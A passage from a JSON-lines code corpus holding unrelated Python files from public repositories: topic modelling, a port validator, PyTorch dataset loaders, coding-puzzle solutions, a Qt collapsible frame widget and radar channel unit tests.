len(l) == 0 or l.startswith(\"#\"):\n\t\t\t\t\tcontinue\n\t\t\t\tparts = l.split(\"\\t\")\n\t\t\t\tif len(parts) < 3:\n\t\t\t\t\tcontinue\n\t\t\t\tdoc_index = int(parts[0])\n\t\t\t\t# find the topic with the max weight\n\t\t\t\tweights = []\n\t\t\t\tfor p in parts[2:]:\n\t\t\t\t\tweights.append( float(p) )\n\t\t\t\tweights = np.array(weights)\n\t\t\t\tpartition[doc_index] = weights.argmax()\n\t\treturn partition\n\n\tdef __rerank_terms( self, num_terms, k, mallet_weights_path, eps = 1e-9 ):\n\t\t\"\"\"\n\t\tImplements the term re-weighting method proposed by Blei and Lafferty.\n\t\t\"\"\"\n\t\tlog.debug( \"Reweighting terms ...\" )\n\t\t# Parse weights for all terms and topics\n\t\tW = np.zeros( (num_terms, k) )\n\t\twith open(mallet_weights_path) as f:\n\t\t\tlines = [line.rstrip() for line in f]\n\t\t\tfor l in lines:\n\t\t\t\tif len(l) == 0 or l.startswith(\"#\"):\n\t\t\t\t\tcontinue\n\t\t\t\tparts = l.split(\"\\t\")\n\t\t\t\tif len(parts) < 3:\n\t\t\t\t\tcontinue\n\t\t\t\ttopic_index = int(parts[0])\n\t\t\t\tterm_index = int(parts[1])\n\t\t\t\tW[term_index,topic_index] = float(parts[2])\n\t\t# Calculate geometric means\n\t\tgmeans = gmean( W, axis = 1 )\n\t\t# Reweight the terms\n\t\t# TODO: vectorize this\n\t\tfor row in range(num_terms):\n\t\t\tif gmeans[row] <= eps or np.isnan( gmeans[row] ):\n\t\t\t\tcontinue\n\t\t\tfor col in range(k):\n\t\t\t\tif W[row,col] <= eps:\n\t\t\t\t\tcontinue\n\t\t\t\tlp = np.log( W[row,col] / gmeans[row] )\n\t\t\t\tif np.isnan( lp ):\n\t\t\t\t\tcontinue\n\t\t\t\tW[row,col] = W[row,col] * lp\n\t\t# Get new term rankings per topic\n\t\trankings = []\n\t\tfor topic_index in range(k):\n\t\t\tranking = np.argsort( W[:,topic_index] )[::-1].tolist()\n\t\t\trankings.append( ranking )\n\t\treturn rankings\n\n\n","repo_name":"derekgreene/topic-stability","sub_path":"unsupervised/lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"61"} +{"seq_id":"39513086037","text":"'''Server port validity check.'''\r\n\r\n\r\nclass Port:\r\n    def __set__(self, instance, value):\r\n        if not 1023 < value < 65536:\r\n            print(\r\n                f'Port error. Port {value} is not valid. 
Valid ports range from 1024 to 65535.')\r\n            exit(1)\r\n        else:\r\n            print('GOOD')\r\n            instance.__dict__[self.name] = value\r\n\r\n    def __set_name__(self, owner, name):\r\n        self.name = name\r\n","repo_name":"FuckingSherlock/Async_Chat","sub_path":"server/descr.py","file_name":"descr.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28426689634","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n-------------------------------------------------\r\n   File Name:     dataset\r\n   Author :       Hengrong LAN\r\n   Date:          2018/12/26\r\n-------------------------------------------------\r\n   Change Activity:\r\n                   2018/12/26:\r\n-------------------------------------------------\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport torch\r\nimport scipy\r\nimport os\r\nimport os.path\r\nimport torchvision.transforms as transforms\r\nimport torch.utils.data as data\r\nfrom torch.utils.data import DataLoader\r\nimport scipy.io as scio\r\n\r\n\r\ndef np_range_norm(image, maxminnormal=True, range1=True):\r\n\r\n    if image.ndim == 2 or (image.ndim == 3 and image.shape[0] == 1):\r\n        if maxminnormal:\r\n            _min = image.min()\r\n            _range = image.max() - image.min()\r\n            normal_image = (image - _min) / _range\r\n            if range1:\r\n                normal_image = (normal_image - 0.5) * 2\r\n        else:\r\n            _mean = image.mean()\r\n            _std = image.std()\r\n            normal_image = (image - _mean) / _std\r\n\r\n        return normal_image\r\n\r\n\r\n\r\nclass ReconDataset(data.Dataset):\r\n    __inputdata = []\r\n    __outputimg = []\r\n    __outputdata = []\r\n\r\n    def __init__(self, root, train=True, transform=None):\r\n        self.__inputdata = []\r\n        self.__outputdata = []\r\n        self.__outputimg = []\r\n\r\n        self.root = os.path.expanduser(root)\r\n        self.transform = transform\r\n        self.train = train\r\n        if train:\r\n            folder = root + \"Train/\"\r\n        else:\r\n            folder = root + \"Test/\"\r\n\r\n        for file in os.listdir(folder):\r\n            #print(file)\r\n            matdata = scio.loadmat(folder + file)\r\n            prt = matdata['prt']\r\n\r\n            nviews, _, _ = prt.shape\r\n            for index in range(0,nviews):\r\n                prt[index,:,:]=np_range_norm(prt[index,:,:], maxminnormal=False, range1=False)\r\n            out_data = np.concatenate([prt[0:48,:,:],prt[80:,:,:]])\r\n            pnum = np.sum(prt,axis=0)\r\n            self.__inputdata.append(prt[48:80,:,:])\r\n\r\n            self.__outputdata.append(out_data)\r\n\r\n            self.__outputimg.append(pnum[np.newaxis,:,:])\r\n\r\n    def __getitem__(self, index):\r\n\r\n        rawdata = self.__inputdata[index]\r\n        out_rawdata = self.__outputdata[index]   #.reshape((1,1,2560,120))\r\n\r\n        DAS = self.__outputimg[index]\r\n\r\n        rawdata = torch.Tensor(rawdata)\r\n        out_rawdata = torch.Tensor(out_rawdata)\r\n        DAS = torch.Tensor(DAS)\r\n\r\n        return rawdata, out_rawdata, DAS\r\n\r\n    def __len__(self):\r\n        return len(self.__inputdata)\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    dataset_pathr = 'D:/detector_synthesis/brain/'\r\n\r\n    mydataset = ReconDataset(dataset_pathr,train=False)\r\n    #print(mydataset.__getitem__(3))\r\n    train_loader = DataLoader(\r\n        mydataset,\r\n        batch_size=1, shuffle=True)\r\n    batch_idx, (rawdata, out_rawdata,DAS) = list(enumerate(train_loader))[0]\r\n    print(rawdata.size())\r\n    print(out_rawdata.size())\r\n    print(rawdata.max())\r\n    print(rawdata.min())\r\n    
print(mydataset.__len__())\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"chenyilan/BSR-Net","sub_path":"utils/mydataset1.py","file_name":"mydataset1.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"35105671741","text":"def fizz_buzz(number):\r\n    if (number % 5 == 0) and (number % 3 == 0):\r\n        return \"Fizz Buzz\"\r\n    if number % 3 == 0:\r\n        return \"Fizz\"\r\n    if number % 5 == 0:\r\n        return \"Buzz\"\r\n    return f\"{number}\"\r\n\r\n\r\ndef emoji_converter(sentence_):\r\n    words = sentence_.split(\" \")\r\n    emoji_collection = {\r\n        \":)\": \"😊\",\r\n        \":D\": \"😃\",\r\n        \":(\": \"☹\",\r\n        \":o\": \"😯\"\r\n    }\r\n    # join with single spaces instead of accumulating a leading space per word\r\n    return \" \".join(emoji_collection.get(word, word) for word in words)\r\n","repo_name":"hiimmuc/python_learn_part2","sub_path":"funtion_.py","file_name":"funtion_.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12926296254","text":"# from automl_workflow.api import DataLoader\n\nimport torch\nimport os\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\nimport pandas as pd\nfrom skimage import io, transform\nimport numpy as np\n\nclass MyDataLoader(object):\n    \"\"\"TODO: default PyTorch dataloader for train, validation, test, etc.\"\"\"\n\n    def __call__(self, dataset, train=True):\n        pt_dataloader = torch.utils.data.DataLoader(dataset, batch_size=4,\n                                                    shuffle=train, num_workers=2)\n        return pt_dataloader\n\n# DEMO\n\n'''\nFor the Dataset to be processed by the PyTorch Dataloader, we need to implement\nthe `__len__` method and the `__getitem__` method.\n'''\nclass FaceDataSet(Dataset):\n    \"\"\"Face Landmarks dataset from pytorch tutorial.\"\"\"\n\n    def __init__(self, csv_file, root_dir, transform=None):\n        \"\"\"\n        Args:\n            csv_file (string): Path to the csv file with annotations.\n            root_dir (string): Directory with all the images.\n            transform (callable, optional): Optional transform to be applied\n                on a sample.\n        \"\"\"\n        self.landmarks_frame = pd.read_csv(csv_file)\n        self.root_dir = root_dir\n        self.transform = transform\n\n    # must implement this method\n    def __len__(self):\n        return len(self.landmarks_frame)\n\n    # must implement this method\n    def __getitem__(self, idx):\n        if torch.is_tensor(idx):\n            idx = idx.tolist()\n\n        img_name = os.path.join(self.root_dir,\n                                self.landmarks_frame.iloc[idx, 0])\n        image = io.imread(img_name)\n        landmarks = self.landmarks_frame.iloc[idx, 1:]\n        landmarks = np.array([landmarks])\n        landmarks = landmarks.astype('float').reshape(-1, 2)\n        sample = {'image': image, 'landmarks': landmarks}\n\n        if self.transform:\n            sample = self.transform(sample)\n\n        return sample\n\n\n'''\nCustom implementation of ToTensor that processes the output of the dataset. \nThe process is necessary because we also include auxiliary data of the dataset\nin this demo (landmark). \n'''\nclass ToTensor(object):\n    \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n    # major method to be implemented\n    def __call__(self, sample):\n        image, landmarks = sample['image'], sample['landmarks']\n\n        # swap color axis because\n        # numpy image: H x W x C\n        # torch image: C X H X W\n        image = image.transpose((2, 0, 1))\n        return {'image': torch.from_numpy(image),\n                'landmarks': torch.from_numpy(landmarks)}\n\n'''\nCustom implementation of Rescale that processes the output of the dataset. 
\n'''\nclass Rescale(object):\n \"\"\"Rescale the image in a sample to a given size.\n\n Args:\n output_size (tuple or int): Desired output size. If tuple, output is\n matched to output_size. If int, smaller of image edges is matched\n to output_size keeping aspect ratio the same.\n \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n self.output_size = output_size\n\n def __call__(self, sample):\n image, landmarks = sample['image'], sample['landmarks']\n\n h, w = image.shape[:2]\n if isinstance(self.output_size, int):\n if h > w:\n new_h, new_w = self.output_size * h / w, self.output_size\n else:\n new_h, new_w = self.output_size, self.output_size * w / h\n else:\n new_h, new_w = self.output_size\n\n new_h, new_w = int(new_h), int(new_w)\n\n img = transform.resize(image, (new_h, new_w))\n\n # h and w are swapped for landmarks because for images,\n # x and y axes are axis 1 and 0 respectively\n landmarks = landmarks * [new_w / w, new_h / h]\n\n return {'image': img, 'landmarks': landmarks}\n\n\ndef face_dataset_demo():\n # Demo for using this face dataset\n composed = transforms.Compose([Rescale((224, 224)), ToTensor()])\n transformed_dataset = FaceDataSet(csv_file='faces/face_landmarks.csv',\n root_dir='faces/',\n transform=composed)\n\n for i in range(len(transformed_dataset)):\n sample = transformed_dataset[i]\n print(i, sample['image'].size(), sample['landmarks'].size())\n if i == 3:\n print('-' * 10)\n break\n\n dataloader = DataLoader(transformed_dataset, batch_size=4,\n shuffle=True, num_workers=0)\n \n for i_batch, sample_batched in enumerate(dataloader):\n print(i_batch, sample_batched['image'].size(), sample_batched['landmarks'].size())\n\n# face_dataset_demo()\n\n\n### Import CIFAR-10 training data loader ###\n\nfrom automl_workflow.cifar10_data_loader import trainloader, testloader, trainset, testset\n\nMyTrainSet = lambda: trainset\nMyTestSet = lambda: testset\nMyTrainDataLoader = lambda: trainloader\nMyTestDataLoader = lambda: testloader","repo_name":"zhengying-liu/automl-workflow","sub_path":"automl_workflow/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"23551874321","text":"data = open('B-large.in','r')\r\nd = open('B-large.out','w')\r\n\r\ncases = int(data.readline())\r\nfor j in range(cases):\r\n num = [int(x) for x in str(int(data.readline()))]\r\n for i in range(len(num) -1):\r\n if num[i] > num[i+1] and num[i] == 1:\r\n num = [ 9 for x in range(len(num))];num[0] = 0\r\n elif num[i] > num[i+1]:\r\n for k in range(len(num)):\r\n if num[k] == num[i]:\r\n num[k] -= 1;num[k+1:] = [ 9 for x in range(k+1,len(num))]\r\n break\r\n ans = int(\"\".join(str(x) for x in num))\r\n print >>d,('Case #' + str(j+1) + ': ' + str(ans))\r\nd.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1190.py","file_name":"1190.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3238202136","text":"# Need to use Morris Traversal to achieve Space in O(1)\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def recoverTree(self, root: TreeNode) -> None:\n \"\"\"\n Do not return anything, modify root in-place instead.\n \"\"\"\n # using inorder to find 
uncommon place in BST\n        # an 'uncommon' place is an adjacent inorder pair (a, b) with b < a\n        # if one uncommon pair is found, the swapped nodes are adjacent: swap that pair\n        # if two uncommon pairs are found, swap the first element of the first pair\n        # with the second element of the second pair\n        \n        def inOrder(root, l):\n            if root.left != None:\n                inOrder(root.left, l)\n            l.append(root)\n            if root.right != None:\n                inOrder(root.right, l)\n        \n        inOrderList = []\n        inOrder(root, inOrderList)\n        uncommon = []\n        for i in range(1, len(inOrderList)):\n            if inOrderList[i].val < inOrderList[i-1].val:\n                uncommon.append(inOrderList[i-1])\n                uncommon.append(inOrderList[i])\n        \n        if len(uncommon) == 2:\n            uncommon[0].val, uncommon[1].val = uncommon[1].val, uncommon[0].val\n        else:\n            uncommon[0].val, uncommon[-1].val = uncommon[-1].val, uncommon[0].val\n        \n        ","repo_name":"chien-wei/LeetCode","sub_path":"0099_Recover_Binary_Search_Tree.py","file_name":"0099_Recover_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15530313093","text":"from PySide2 import QtWidgets, QtCore, QtGui\n\n__author__ = \"Ryan Robinson\"\n\n\nclass FrameWidget(QtWidgets.QWidget):\n    \"\"\"A Widget that attempts to mimic Maya's frameLayout\n\n    Notes:\n        This is a widget rather than a layout so it can be moved\n        from place to place, whereas a layout cannot be moved in Qt.\n\n        The background color will be set from the current theme's\n        button color.\n\n    \"\"\"\n\n    def __init__(self, text=\"\", collapsible=False, parent=None):\n        QtWidgets.QWidget.__init__(self, parent)\n\n        layout = QtWidgets.QVBoxLayout()\n        layout.setContentsMargins(0, 0, 0, 0)\n        layout.setSpacing(0)\n        self._title_widget = _FrameTitle(text)\n        layout.addWidget(self._title_widget)\n\n        # The main frame that contains the items added to the widget\n        self._content_widget = QtWidgets.QFrame()\n        # The main layout items will be added to\n        self._content_layout = QtWidgets.QVBoxLayout()\n        self._content_layout.setContentsMargins(0, 0, 0, 0)\n        self._content_widget.setLayout(self._content_layout)\n\n        layout.addWidget(self._content_widget)\n        QtWidgets.QWidget.setLayout(self, layout)\n\n        self._title_widget.onCollapse.connect(self._on_title_pressed)\n        self.setCollapsible(collapsible)\n\n    def _on_title_pressed(self, collapse):\n        self._content_widget.setVisible(not collapse)\n\n    def setText(self, text):\n        \"\"\"Set the text displayed in the title\"\"\"\n        self._title_widget.setText(text)\n\n    def text(self):\n        \"\"\"Get the current text displayed in the title\"\"\"\n        return self._title_widget.text()\n\n    def setCollapsible(self, value):\n        \"\"\"Set whether the widget is collapsible\"\"\"\n        self._title_widget.setCollapsible(value)\n\n    def collapsible(self):\n        \"\"\"Get whether the widget is collapsible\"\"\"\n        return self._title_widget.collapsible()\n\n    def setCollapsed(self, value):\n        \"\"\"Set the collapsed state\n\n        Args:\n            value(bool): state of collapse\n        \"\"\"\n        self._title_widget.setCollapsed(value)\n\n    def collapsed(self):\n        \"\"\"Get the collapsed state\n\n        Returns:\n            bool:\n        \"\"\"\n        return self._title_widget.collapsed()\n\n    def addLayout(self, *args, **kwargs):\n        \"\"\"Convenience method to add/remove items from the widget\n        See Qt Docs for signatures\n        \"\"\"\n        self._content_layout.addLayout(*args, **kwargs)\n\n    def addWidget(self, *args, **kwargs):\n        \"\"\"Convenience method to add/remove items from the widget\n        See Qt Docs for signatures\n        \"\"\"\n        self._content_layout.addWidget(*args, **kwargs)\n\n    def removeWidget(self, *args, **kwargs):\n        
\"\"\"Convenience method to add/remove items from the widget\n See Qt Docs for signatures\n \"\"\"\n self._content_layout.removeWidget(*args, **kwargs)\n\n def removeItem(self, *args, **kwargs):\n \"\"\"Convenience method to add/remove items from the widget\n See Qt Docs for signatures\n \"\"\"\n self._content_layout.removeItem(*args, **kwargs)\n\n def addItem(self, *args, **kwargs):\n \"\"\"Convenience method to add/remove items from the widget\n See Qt Docs for signatures\n \"\"\"\n self._content_layout.addItem(*args, **kwargs)\n\n def addSpacerItem(self, *args, **kwargs):\n \"\"\"Convenience method to add/remove items from the widget\n See Qt Docs for signatures\n \"\"\"\n self._content_layout.addSpacerItem(*args, **kwargs)\n\n def layout(self):\n \"\"\"Get the main layout items are added to\"\"\"\n return self._content_layout\n\n def setLayout(self, layout):\n \"\"\"Set the main layout to the given\"\"\"\n self._content_layout = layout\n self._content_widget.setLayout(layout)\n\n def children(self):\n \"\"\"Convenience method to get the children of the current layout\n \"\"\"\n return self._content_layout.children()\n\n\nclass _FrameTitle(QtWidgets.QWidget):\n \"\"\"The widget that handles the display of the title and the\n collapsed state of the :class:`FrameWidget`\n\n Args:\n text (str): text to set\n \"\"\"\n\n onCollapse = QtCore.Signal(bool)\n\n def __init__(self, text):\n\n QtWidgets.QWidget.__init__(self)\n # The long edge of the arrow |>\n self._arrow_height = 11\n # The distance of the point from the long edge |-\n self._arrow_depth = 6\n # The base left margin used to offset the text and arrow\n self._base_margin = 10\n # Roundness of borders\n self.border_radius = 2\n self._text = \"\"\n\n self._collapsible = True\n self._collapsed = False\n\n self.setFixedHeight(22)\n self.setMinimumSize(QtCore.QSize(20, 22))\n self.setText(text)\n\n def setText(self, text):\n \"\"\"Set the text of the frame\"\"\"\n self._text = text\n self.repaint()\n\n def text(self):\n \"\"\"Get the current text of the frame\"\"\"\n return self._text\n\n def setCollapsible(self, value):\n \"\"\"Set the widget as collapsible\"\"\"\n self._collapsible = value\n if not value:\n # Force show the contents if we are not collapsible\n self.setCollapsed(False)\n else:\n self.repaint()\n\n def collapsible(self):\n \"\"\"Get whether the widget is collapsible or not\"\"\"\n return self._collapsible\n\n def setCollapsed(self, value):\n \"\"\"Set the collapsed state\"\"\"\n self._collapsed = value\n self.repaint()\n self.onCollapse.emit(value)\n\n def collapsed(self):\n \"\"\"Get the collapsed state\"\"\"\n return self._collapsed\n\n def mousePressEvent(self, event):\n \"\"\"Override to handle the click functionality\"\"\"\n if self._collapsible:\n self.setCollapsed(not self._collapsed)\n QtWidgets.QWidget.mouseReleaseEvent(self, event)\n\n def paintEvent(self, event):\n \"\"\"Override paint event to display custom options\"\"\"\n # Initialize everything we need\n rect = event.rect() # type: QtCore.QRect\n painter = QtGui.QPainter(self)\n palette = self.palette() # type: QtGui.QPalette\n\n transparent_pen = QtGui.QPen(QtGui.QColor(0, 0, 0, 0))\n # Because the font is later set as bold. 
Store this to reset back\n orig_font = painter.font() # type: QtGui.QFont\n\n # Handle drawing as a \"flat\" button\n btn_rect = rect.adjusted(0, 1, 0, -1)\n painter.setBrush(palette.button())\n painter.setPen(transparent_pen)\n painter.setBrush(palette.button())\n painter.drawRoundedRect(btn_rect, self.border_radius, self.border_radius, QtCore.Qt.AbsoluteSize)\n\n # Draw the text as bold with the with the windowText color\n text_margin = self._base_margin\n # If this is collapsible offset the text event more\n if self._collapsible:\n text_margin += 18\n text_rect = btn_rect.adjusted(text_margin, 1, 0, 0)\n painter.setPen(QtGui.QPen(palette.color(palette.WindowText)))\n font = painter.font() # type: QtGui.QFont\n font.setBold(font.Bold)\n painter.setFont(font)\n painter.drawText(text_rect,\n QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter,\n self._text)\n painter.setFont(orig_font)\n\n if not self._collapsible:\n return\n\n # Handle the collapsed indicator\n if self._collapsed:\n offset = (btn_rect.height() - self._arrow_height) / 2.0\n arrow = [\n QtCore.QPointF(self._base_margin, offset),\n QtCore.QPointF(self._base_margin + self._arrow_depth,\n offset + (self._arrow_height / 2.0)),\n QtCore.QPointF(self._base_margin, offset + self._arrow_height),\n ]\n else:\n margin = self._base_margin - 3\n offset = (btn_rect.height() - self._arrow_depth) / 2.0\n arrow = [\n QtCore.QPointF(margin, offset),\n QtCore.QPointF(margin + (self._arrow_height / 2.0),\n offset + self._arrow_depth),\n QtCore.QPointF(margin + self._arrow_height, offset),\n ]\n\n painter.setPen(transparent_pen)\n painter.setBrush(palette.buttonText())\n painter.drawPolygon(arrow)\n","repo_name":"dotRyan/dotblox","sub_path":"python/dotblox/qt/framewidget.py","file_name":"framewidget.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"5580775187","text":"# -*- coding: utf-8 -*-\n\"\"\"Test Radar Channel\"\"\"\n\nfrom __future__ import annotations\nimport unittest\nfrom unittest.mock import patch, Mock, PropertyMock\n\nimport numpy as np\nfrom numpy.random import default_rng\nfrom numpy.testing import assert_array_almost_equal, assert_array_equal\nfrom scipy.constants import pi, speed_of_light\n\nfrom hermespy.channel import SingleTargetRadarChannel, MultiTargetRadarChannel, VirtualRadarTarget, PhysicalRadarTarget, FixedCrossSection\nfrom hermespy.channel.radar_channel import MultiTargetRadarChannelRealization, SingleTargetRadarChannelRealization, RadarChannelBase, RadarChannelRealization, RadarPathRealization, RadarInterferenceRealization, RadarTargetRealization\nfrom hermespy.core import Direction, FloatingError, IdealAntenna, Moveable, Signal, Transformation, UniformArray\nfrom hermespy.simulation import SimulatedDevice\nfrom unit_tests.core.test_factory import test_yaml_roundtrip_serialization\n\n\n__author__ = \"Andre Noll Barreto\"\n__copyright__ = \"Copyright 2023, Barkhausen Institut gGmbH\"\n__credits__ = [\"Andre Noll Barreto\", \"Jan Adler\"]\n__license__ = \"AGPLv3\"\n__version__ = \"1.1.0\"\n__maintainer__ = \"Jan Adler\"\n__email__ = \"jan.adler@barkhauseninstitut.org\"\n__status__ = \"Prototype\"\n\n\nclass RadarChannelRealizationMock(RadarChannelRealization):\n \"\"\"Radar channel realization for base class testing\"\"\"\n \n def null_hypothesis(self, num_samples: int, sampling_rate: float) -> RadarChannelRealizationMock:\n\n impulse_response = self.ImpulseResponse([], self.gain, num_samples, sampling_rate, 
self.channel.transmitter, self.channel.receiver)\n return RadarChannelRealizationMock(self.channel, self.gain, impulse_response)\n\n def ground_truth(self) -> np.ndarray:\n return np.empty((0, 3), dtype=np.float_)\n\n\nclass RadarChannelMock(RadarChannelBase[RadarChannelRealizationMock]):\n \"\"\"Radar channel for base class testing\"\"\"\n \n def realize(self, num_samples: int, sampling_rate: float) -> RadarChannelRealizationMock:\n \n global_position = np.array([1, 1, 1], dtype=np.float_) \n target_realization = RadarTargetRealization(0, 0, 0, 1, 2, np.eye(self.receiver.antennas.num_receive_antennas, self.transmitter.antennas.num_transmit_antennas), global_position, global_position)\n impulse_response = RadarChannelRealization.ImpulseResponse([target_realization], self.gain, num_samples, sampling_rate, self.transmitter, self.receiver)\n\n return RadarChannelRealizationMock(self, self.gain, impulse_response)\n\n\nclass TestFixedCrossSection(unittest.TestCase):\n \"\"\"Test the fixed radar cross section model\"\"\"\n \n def setUp(self) -> None:\n \n self.cross_section = FixedCrossSection(1.23454)\n \n def test_init(self) -> None:\n \"\"\"Class initialization parameters should be properly stored as attributes\"\"\"\n \n self.assertEqual(1.23454, self.cross_section.cross_section)\n \n def test_cross_section_setget(self) -> None:\n \"\"\"Cross section property getter should return setter argument\"\"\"\n \n expected_cross_section = 2.34455\n self.cross_section.cross_section = expected_cross_section\n \n self.assertEqual(expected_cross_section, self.cross_section.cross_section)\n \n def test_cross_section_validation(self) -> None:\n \"\"\"Cross section property setter should raise a ValueError on invalid arguments\"\"\"\n\n with self.assertRaises(ValueError):\n self.cross_section.cross_section = -1.\n \n def test_get_cross_section(self) -> None:\n \"\"\"Getting a cross section should return the fixed value\"\"\"\n \n impinging_direction = Direction.From_Spherical(0., 0.)\n emerging_direction = Direction.From_Spherical(1., 1.)\n \n cross_section = self.cross_section.get_cross_section(impinging_direction, emerging_direction)\n self.assertEqual(1.23454, cross_section)\n\n \nclass TestVirtualRadarTarget(unittest.TestCase):\n \n def setUp(self) -> None:\n \n self.cross_section = FixedCrossSection(1.234)\n self.velocity = np.array([1, 2, 3], dtype=float)\n self.pose = Transformation.From_Translation(np.array([2, 3, 4]))\n \n self.target = VirtualRadarTarget(self.cross_section, self.velocity, self.pose)\n \n def test_init(self) -> None:\n \"\"\"Initialization paramters should be properly stored as class attributes\"\"\"\n \n self.assertIs(self.cross_section, self.target.cross_section)\n assert_array_almost_equal(self.velocity, self.target.velocity)\n assert_array_almost_equal(self.pose, self.target.pose)\n \n def test_cross_section_setget(self) -> None:\n \"\"\"Cross section property getter should return setter argument\"\"\"\n \n expected_cross_section = FixedCrossSection(2.345)\n self.target.cross_section = expected_cross_section\n \n self.assertIs(expected_cross_section, self.target.cross_section)\n \n def test_velocity_setget(self) -> None:\n \"\"\"Velocity property getter should return setter argument\"\"\"\n \n expected_velocity = np.array([4, 5, 6])\n self.target.velocity = expected_velocity\n\n assert_array_almost_equal(expected_velocity, self.target.velocity)\n \n def test_get(self) -> None:\n \"\"\"Getting target parameters should return correct information\"\"\"\n \n 
self.assertEqual(1.234, self.target.get_cross_section(Direction(np.array([1, 0, 0])), Direction(np.array([1, 0, 0]))))\n assert_array_almost_equal(self.velocity, self.target.get_velocity())\n assert_array_almost_equal(self.target.forwards_transformation, self.target.get_forwards_transformation())\n assert_array_almost_equal(self.target.backwards_transformation, self.target.get_backwards_transformation())\n\n\nclass TestPhysicalRadarTarget(unittest.TestCase):\n \n def setUp(self) -> None:\n \n self.cross_section = FixedCrossSection(1.234)\n self.velocity = np.array([1, 2, 3], dtype=float)\n self.pose = Transformation.From_Translation(np.array([2, 3, 4]))\n self.moveable = Moveable(self.pose, self.velocity)\n\n self.target = PhysicalRadarTarget(self.cross_section, self.moveable)\n\n def test_init(self) -> None:\n \"\"\"Initialization paramters should be properly stored as class attributes\"\"\"\n\n self.assertIs(self.cross_section, self.target.cross_section)\n self.assertIs(self.moveable, self.target.moveable)\n\n def test_cross_section_setget(self) -> None:\n \"\"\"Cross section property getter should return setter argument\"\"\"\n \n expected_cross_section = FixedCrossSection(2.345)\n self.target.cross_section = expected_cross_section\n \n self.assertIs(expected_cross_section, self.target.cross_section)\n \n def test_get(self) -> None:\n \"\"\"Getting target parameters should return correct information\"\"\"\n \n self.assertEqual(1.234, self.target.get_cross_section(Direction(np.array([1, 0, 0])), Direction(np.array([1, 0, 0]))))\n assert_array_almost_equal(self.velocity, self.target.get_velocity())\n assert_array_almost_equal(self.moveable.forwards_transformation, self.target.get_forwards_transformation())\n assert_array_almost_equal(self.moveable.backwards_transformation, self.target.get_backwards_transformation())\n\n\nclass TestRadarChannelRealization(unittest.TestCase):\n \n def setUp(self) -> None:\n \n self.rng = default_rng(42)\n \n self.transmitter = SimulatedDevice(carrier_frequency=1e9)\n self.receiver = SimulatedDevice(carrier_frequency=1e9)\n self.channel = RadarChannelMock(transmitter=self.transmitter, receiver=self.receiver)\n self.gain = 1.234\n self.impulse_response = self.gain**.5 * self.rng.normal(size=(1, 1, 1, 1))\n \n self.realization = RadarChannelRealizationMock(self.channel, self.gain, self.impulse_response)\n\n def test_init_validation(self) -> None:\n \"\"\"Initializing should raise a ValueError o invalid arguments.\"\"\"\n \n with self.assertRaises(ValueError):\n _ = RadarChannelRealizationMock(self.channel, -1, self.impulse_response)\n \n\nclass TestRadarChannelBase(unittest.TestCase):\n \n def setUp(self) -> None:\n \n self.rng = default_rng(42)\n self.carrier_frequency = 1e9\n \n self.transmitter = SimulatedDevice(carrier_frequency=self.carrier_frequency, antennas=UniformArray(IdealAntenna, .01, (2, 1, 1)))\n self.receiver = SimulatedDevice(carrier_frequency=self.carrier_frequency, antennas=UniformArray(IdealAntenna, .01, (3, 1, 1)))\n self.channel = RadarChannelMock(self, transmitter=self.transmitter, receiver=self.receiver)\n \n def test_attenuate_setget(self) -> None:\n \"\"\"Attenuate property getter should return setter argument\"\"\"\n \n self.channel.attenuate = False\n self.assertFalse(self.channel.attenuate)\n \n def test_realize_target(self) -> None:\n \"\"\"Test subroutine to realize a radar target\"\"\"\n \n cross_section = FixedCrossSection(1.)\n veolicty = np.zeros(3, dtype=float)\n pose = Transformation.From_Translation(np.array([100., 0., 0.], 
dtype=float))\n target = VirtualRadarTarget(cross_section, veolicty, pose)\n \n realization = self.channel._realize_target(1e9, target)\n \n self.assertAlmostEqual(2 * 100 / speed_of_light, realization.delay)\n self.assertSequenceEqual((self.receiver.antennas.num_receive_antennas, self.transmitter.antennas.num_transmit_antennas), realization.mimo_response.shape)\n\n def test_realize_target_validation(self) -> None:\n \"\"\"Target realization subroutine should raise errors on invalid parameter combinations\"\"\"\n \n cross_section = FixedCrossSection(1.)\n veolicty = np.zeros(3, dtype=float)\n pose = Transformation.From_Translation(np.array([100., 0., 0.], dtype=float))\n target = VirtualRadarTarget(cross_section, veolicty, pose)\n \n with self.assertRaises(ValueError):\n _ = self.channel._realize_target(0, target)\n \n with self.assertRaises(ValueError):\n _ = self.channel._realize_target(-1, target)\n \n target.position = self.transmitter.global_position\n with self.assertRaises(RuntimeError):\n _ = self.channel._realize_target(1, target)\n \n self.receiver.position = np.array([1, 2, 3])\n target.position = self.receiver.global_position\n with self.assertRaises(RuntimeError):\n _ = self.channel._realize_target(1, target)\n \n self.channel.transmitter = None\n 